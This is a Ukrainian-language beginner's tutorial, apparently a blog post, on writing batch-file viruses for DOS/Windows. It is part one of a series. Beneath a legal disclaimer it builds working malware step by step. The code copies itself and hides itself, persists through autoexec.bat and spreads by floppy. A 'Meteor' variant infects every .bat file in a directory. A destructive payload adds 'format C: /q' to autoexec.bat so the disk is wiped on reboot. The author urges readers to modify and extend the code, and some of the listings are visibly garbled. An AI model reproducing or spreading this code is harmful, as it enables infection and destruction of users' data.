Вступ.
Нещодавно качав оновлення для Каспера і наче щось клацнуло задумався про віруси в цілому: про те, які бувають віруси, про можливості тих чи інших вірусів, а головне про написання
Вірусів «розплодилося» — хоч греблю гати!!! В інеті їх сила-силенна! З’явилися сайти, що спеціалізуються на віруси, тобто сайти, де про віруси можна не тільки багато чого цікавого дізнатися, але і завантажити готові, скомпільовані, запаковані ZIPом вирусочки;) А тим не менше майже всі вируски, викладені на таких сайтах, палятся. Прикро 🙁
А адже можна самому писати ці шкідливі проги! Звичайно, початківець вирусописатель не зможе написати такого «монстрика», який би не палился зараз всі антивірусні кампанії використовують технологію виявлення невідомих вірусів, і простенькі віруси, написані новачком, обов’язково спалять! Але ми ж не ламер! Будемо вдосконалюватися (адже ця стаття частина 1). А поки почнемо з простого і зрозумілого.
Хочу відразу попередити, що дана стаття орієнтована на початківців вірусописьменників (але НЕ на новачків звинуваченням у хакерстві!).
І ось ще що: стаття написана в цілях ознайомлення з можливою небезпекою, і за використання нижчевикладеній інформації з метою заподіяння шкоди я (автор) не несу ніякої відповідальності.
Ой, ні, ще не все (мало не забув):

Стаття 273. Створення, використання і поширення шкідливих програм
для ЕОМ
1.Створення програм для ЕОМ або внесення змін в існуючі програми, явно призводять до несанкціонованого знищення, блокування, модифікації або копіювання інформації, порушення роботи ЕОМ, системи ЕОМ або їх мережі, а так само використання або поширення таких програм або машинних носіїв з такими програмами — караються позбавленням волі на строк до трьох років зі штрафом в розмірі від двохсот до п’ятисот мінімальних розмірів оплати праці або в розмірі заробітної плати або іншого доходу засудженого за період від двох до п’яти місяців.
2.Ті самі діяння, що спричинили з необережності тяжкі наслідки, — караються позбавленням волі на строк від трьох до семи років.
Ось тепер, мабуть, все. Почнемо.

Початок почав
Ну, раз вже ми вирішили почати з самого простого, то свій перший вірус створимо в звичайному текстовому редакторі, вбудованому в Виндозу. Такий вірус буде називатися BAT-вірусом.
По мірі написання оригіналу, в фігурних дужках буду пояснювати, про що йдеться.

@Echo off {забороняємо висновок на екран виконуваних команд}
copy %0 c:virus.bat >nul {копіюємо файл; забороняємо висновок на екран самої команди і результату її дії}
echo c:virus.bat>>c:autoexec.bat {додаємо текст у вже існуючий файл}

От і все! Простіше не буває! Це приклад одного з найбільш простих bat-вірусів. Хоча з повною впевненістю сказати, що це вірус, значить сказати дурницю. Подивіться на те, що написано в фігурних дужках і ви зрозумієте, що це просто приклад того, як зробити основу вірусу. Продовжую:

@Echo off
copy %0 c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul {копіюємо цей файл на дискету, якщо така є у дисководі (копіювання відбудеться перезавантаження компа)}

Таким чином до попереднього ісходнику я додав одну рядок і вірус придбав нову здатність: він тепер уміє заражати інші компи через дискету.

@Echo off
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul {встановлюємо файлу virus.bat атрибут «прихований» (файл virus.bat напевно попадеться юзеру на очі і буде їх муляти :), тому робимо його прихованим)}
echo c:virus.bat>>c:autoexec.bat
copy %0 a:run.bat >nul

Ось, наш ісходник починає набувати обрисів вірусу!

@Echo off
if exist c:virus.bat goto ski {перевіряємо, чи існує файл }
copy %0 c:virus.bat >nul
attrib +h c:virus.bat >nul
echo c:virus.bat>>c:autoexec.bat
:ski {якщо він існує, то програма переходить на мітку :ski}
copy %0 a:run.bat >nul

Додав ще одну команду «if exist». Тепер вірус вже буде перевіряти, чи є цей файл, і якщо він є, то вже не будуть виконуватися лишні команди. Тільки копіює себе на дискету і все.
Тепер модернізуємо наш вірус до кінця.

@echo off%[Meteor]% {виводимо на екран текст «Meteor»}

if ‘%1==’In_ goto Meteo {якщо змінна %1 дорівнює In, то переходимо до мітці «:Meteo»}

if exist c:Meteor.bat goto Mete {перевіряємо, чи існує файл Meteor.bat, якщо так, то переходимо до мітці «:Mete»}

if not exist %0 goto Met {якщо файл не існує, то переходимо до мітці «Met»}

find «Meteor»c:Meteor.bat {перевіряємо, чи є файл meteor на диску, якщо ні, то копіюємо його туди}

attrib +h c:Meteor.bat {робимо файл прихованим}

:Mete {мітка}

for %%t in (*.bat) do call c:Meteor In_ %%t {виконуємо одну команду (call — дозволяє викликати один пакетний файл з іншого) для декількох параметрів t} {тобто вірус знаходить файл з розширенням .bat, і заражає його за допомогою команди type, дописуючи себе до знайденого .bat-файлу}

goto Met {перейти до мітці}

:Meteo {мітка}

find «Meteor»nul {вказуємо файл значення 2 і забороняємо висновок команди і її результату на екран}

if not errorlevel 1 goto Met {якщо не сталося помилок (з кодом 1) виконання попередньої команди, то переходимо на мітку}

type c:Meteor.bat>>%2 {дописуємо «себе» до знайденого .bat-файлу}

:Met {мітка}

Ось це вже можна назвати більш або менш повноцінним вірусом!
Для того щоб вірус став вірусом, його потрібно зберегти з розширенням BAT. Тиснемо «Зберегти як», пишемо наприклад virus.bat, і там куди ви його збережіть з’явиться пакетний файл MS-DOS.
На основі цього джерела можна створювати інші віруси. Експериментуйте, модернізуйте, пробуйте написати свій вірус. Скажу до слова, що використовуючи цей исходник, я зробив з нього ще три модифікації. І це не межа! Можливості не обмежені, все залежить від вашої фантазії.

Наведу ще один простий, але цікавий приклад:)

@Echo off
Echo format C: /q >> c:Autoexec.bat

Всі! Нічого особливого, так? Цей вірус додає в autoexec.bat рядок format C: /q і при перезавантаження компа відбувається швидке форматування диска:)
І ось ще що:

Echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%mes.js
echo WSHShell.Popup («ПИШИ СЮДИ ЩО ЗАВГОДНО»); >> %temp%mes.js
start %temp%mes.js
deltree /y %temp%mes.js

Додай цей скрипт в свій вірус, замість «ПИШИ СЮДИ ЩО ЗАВГОДНО» напиши свій текст (наприклад, передсмертну промову для юзера:) ), і при запуску вірусу вилізе віконечко з твоїм повідомленням!

To be continued